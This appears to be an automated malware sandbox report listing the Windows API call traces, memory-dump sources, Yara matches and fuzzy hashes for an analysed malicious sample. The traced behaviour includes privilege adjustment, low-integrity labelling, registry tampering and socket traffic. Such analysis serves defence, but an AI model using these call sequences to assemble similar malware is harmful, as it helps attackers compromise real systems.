                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,76DC34D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4229
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4230
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000,02BD4081,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC424A
                                                                                                                                                                                                            • HeapReAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4251
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Alloc$Validatememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3638075499-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BD4980: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7750FFB0,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49AD
                                                                                                                                                                                                              • Part of subcall function 02BD4980: GetProcessTimes.KERNEL32(00000000,?,?,?,02BC7967,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49CA
                                                                                                                                                                                                              • Part of subcall function 02BD4980: GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49E2
                                                                                                                                                                                                              • Part of subcall function 02BD4980: CloseHandle.KERNEL32(00000000,?,?,?,?,?,02BC7967,00000000), ref: 02BD49F3
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02BFFB80,000002F0,00000000,00000000,0B521168,02BC7AD4), ref: 02BC7828
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7844
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,0B521168), ref: 02BC7869
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC786C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,0B521168), ref: 02BC7879
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC787C
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7887
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3901171168-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                              • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                              • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                              • Part of subcall function 02BD5930: FindCloseChangeNotification.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Security$DescriptorToken$CurrentOpenProcessThread$AdjustChangeCloseConvertErrorFindFreeInfoLastLocalLookupNamedNotificationPrivilegePrivilegesSaclStringValue
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 141549399-820036962
                                                                                                                                                                                                            • Opcode ID: 09d0a1d324d526fb895626fa839b43ab5b48a4af82d8ea1182306967ae069c2f
                                                                                                                                                                                                            • Instruction ID: 16766273108d596bcc35d9cfa1f761a8aaf9491b26b9c222b5324296d89d9aae
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09d0a1d324d526fb895626fa839b43ab5b48a4af82d8ea1182306967ae069c2f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8010C75A40128BBEB24DAA59C84EEFBBBDEF44784B404599BA05D3140E770EA15CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                            • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,02BB3B17), ref: 02BB3864
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(00000000,6988939ca,00000000,?,00000000,?), ref: 02BB3885
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 02BB3893
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                            • String ID: 6988939ca$software\microsoft
                                                                                                                                                                                                            • API String ID: 3677997916-1519107699
                                                                                                                                                                                                            • Opcode ID: 87b5c9d8cef9ae452717c0d4fc2b4666d0c605021700004f1e3171edc234c5bc
                                                                                                                                                                                                            • Instruction ID: e8ca7c269166cf511250656581f828c6c5f1e159dcdc89fe303e5e4156b5c338
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87b5c9d8cef9ae452717c0d4fc2b4666d0c605021700004f1e3171edc234c5bc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33F0C9B5A40308FBEB10DBA4CD45BEEBBB8EB04744F504599EA05A7280D7B5A6148B94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                            • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BC412B
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,02BC1163,00001000,?,?), ref: 02BC413C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02BC414C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            • Opcode ID: 34525b1fdb65a966396ad19d55a44d95f992dfe126135816b4b3839e380a1fe7
                                                                                                                                                                                                            • Instruction ID: 9f5fed09a6fdee6697ebc7433c3e9c3afb347f69845fd6f823f705c026dd2543
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34525b1fdb65a966396ad19d55a44d95f992dfe126135816b4b3839e380a1fe7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11E01230BC03005BB7945B75A80DE663BAABB557C83408C65B795D3220EB64D7648750
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BC43D9
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC440C
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC4438
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC445F
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02BC44DD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            • Opcode ID: a3e84739b8957e163c6b4e3be38dcbe00c349002ed6f11198ba62350cb7505bb
                                                                                                                                                                                                            • Instruction ID: e498500eb31186ac90adcd9cc44349e6c848dbfceec546d5ba50816649e74060
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3e84739b8957e163c6b4e3be38dcbe00c349002ed6f11198ba62350cb7505bb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C410D70D00218AFDB50DFA8D884AEEBBF5EF48704F64856EE955E7240E774AA408F91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BCAACC
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BCAAF1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000012,?,?,?,?,?,02BC1A39), ref: 02BCAB71
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,02BC1A39), ref: 02BCAB78
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCAB88
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,02BC1A39), ref: 02BCAB9D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heapstrstr$AllocProcesslstrcpynmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2033102291-0
                                                                                                                                                                                                            • Opcode ID: aca02ebed7f4a9f801cec8c5c1a3f327a5eb19e40e7398e7197aa42f6acad68f
                                                                                                                                                                                                            • Instruction ID: d5037526b672daaf06a089df85ccf287c31813160e1a430b786f9aab625ff9f3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: aca02ebed7f4a9f801cec8c5c1a3f327a5eb19e40e7398e7197aa42f6acad68f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12310B72A0021D5BD7324E289C84BBA7F9BDF41298F3986EDED85C7201D732DD058790
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BC42A9
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC42DC
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC4308
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC432F
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02BC43AD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            • Opcode ID: 5d63829c8c9d32abf4589f097203a36c04b2be697cd74d6f5100b08175f12ab9
                                                                                                                                                                                                            • Instruction ID: 6101a8163dd7c8d5915ae90fbb4f736d62e8ac0f0f42ddfe30bbdcb0256a592e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d63829c8c9d32abf4589f097203a36c04b2be697cd74d6f5100b08175f12ab9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9541ED70D40218AFDB50DFA8D494AEEBBF5EF88704F64856EE515E7200E774AA408F91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BB13DE
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB141A
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB1446
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB146D
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02BB1498
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            • Opcode ID: 7cf2b6275c89a8345453d2cf863cfa11443b88357e9a03cb164ba124eafc32f2
                                                                                                                                                                                                            • Instruction ID: 4c17c130b265cbd2886f921367a5e7b1fe1dfda08f120123e33cb2aa0ddcda20
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cf2b6275c89a8345453d2cf863cfa11443b88357e9a03cb164ba124eafc32f2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D731CAB1D10209AFDB40DFA8D884AEEBBF9FF4C314F50856AE918E3200E37499418F90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,02BC369B,00000000,00010108,?,00000000), ref: 02BD522F
                                                                                                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02BD5264
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BD528E
                                                                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(00000104,02BC369B), ref: 02BD52A6
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BD52B2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                                                                                            • Opcode ID: b4f668a659048f21157d4c8b8494ba75ef92a0b835b7e300bfda2ba29680f70c
                                                                                                                                                                                                            • Instruction ID: 847378e8d2e8e4c81ed1ed1ac44c0e094a47d83de2c107671b6735880426f8d0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4f668a659048f21157d4c8b8494ba75ef92a0b835b7e300bfda2ba29680f70c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A21C836A40219ABC730DAA8DC44FEAB7BCEB44750F444595FD80EB240E6B0AE548BD0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2377537114-0
                                                                                                                                                                                                            • Opcode ID: 4691f0915c366cd04e191a62b28da9bd4f65198954f3797982a865e3d65c2ab0
                                                                                                                                                                                                            • Instruction ID: 45e2ff64a7ebbb82d318c23d07de6c8b9f628a28bc6deaf585b51d9442d4cad2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4691f0915c366cd04e191a62b28da9bd4f65198954f3797982a865e3d65c2ab0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D21A3B0A102099FD724DF5DD894BAABBF4FF49344F20896CDA8AC3300D7B1A561CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BB5962
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5995
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB59C1
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB59E8
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02BB5A04
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            • Opcode ID: 0351482601a70b22f00ccccbc5189b670d189094de42473f06f229719d8df5b8
                                                                                                                                                                                                            • Instruction ID: b1ca1ef104e0caab0c0193b3e7754b9c3b09878ff3d125b0aff03c315993d6ef
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0351482601a70b22f00ccccbc5189b670d189094de42473f06f229719d8df5b8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A31ABB1D4120DAFDB40CFA8D885AEEBBF5FB48301F50446AE914E7200E7749A548FA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,02BC0AA8,000000FF,00000000,00000000,00000000,00000000,76F8F380,?,?,02BC0AA8,?), ref: 02BCAA37
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013,00000000,?,02BC0AA8,?), ref: 02BCAA54
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02BC0AA8,?), ref: 02BCAA5B
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCAA6B
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,02BC0AA8,000000FF,00000000,00000000,00000000,00000000,?,02BC0AA8,?), ref: 02BCAA88
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharHeapMultiWide$AllocProcessmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 913929354-0
                                                                                                                                                                                                            • Opcode ID: 9d0acf32afe447b8f3f403df49ee879d2881748c56e748c45087dec0916aeed2
                                                                                                                                                                                                            • Instruction ID: 074d64bc1903941ca2ddf452b2abdb3c4baf9203cb1065488fea8beb59339597
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d0acf32afe447b8f3f403df49ee879d2881748c56e748c45087dec0916aeed2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F018F726422267BE6314DA99C48FA77F5CDF46BF0F650354BA24EA1C4DB60E900C6F4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6C1A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6C21
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6C35
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6C4E
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02BB6C5C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3057210225-0
                                                                                                                                                                                                            • Opcode ID: 5b6dffc0091df58dfdaa6cfb625830f61b6dbe2aea705605e0724a1254d195ef
                                                                                                                                                                                                            • Instruction ID: 8c64cddd747798962dd52f2ab085f23a808510fb163e4d7ced43e0cde33227a5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b6dffc0091df58dfdaa6cfb625830f61b6dbe2aea705605e0724a1254d195ef
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE11E171E412585BE72797349D4ABEA376CEF08704F0009E8EB89D3180D7F08D948B91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,761E23A0,?,?), ref: 02BC998D
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC9994
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000400,00000000), ref: 02BC99AF
                                                                                                                                                                                                            • send.WS2_32(?,?,00000000,00000000), ref: 02BC99C0
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000400,00000000), ref: 02BC99D9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
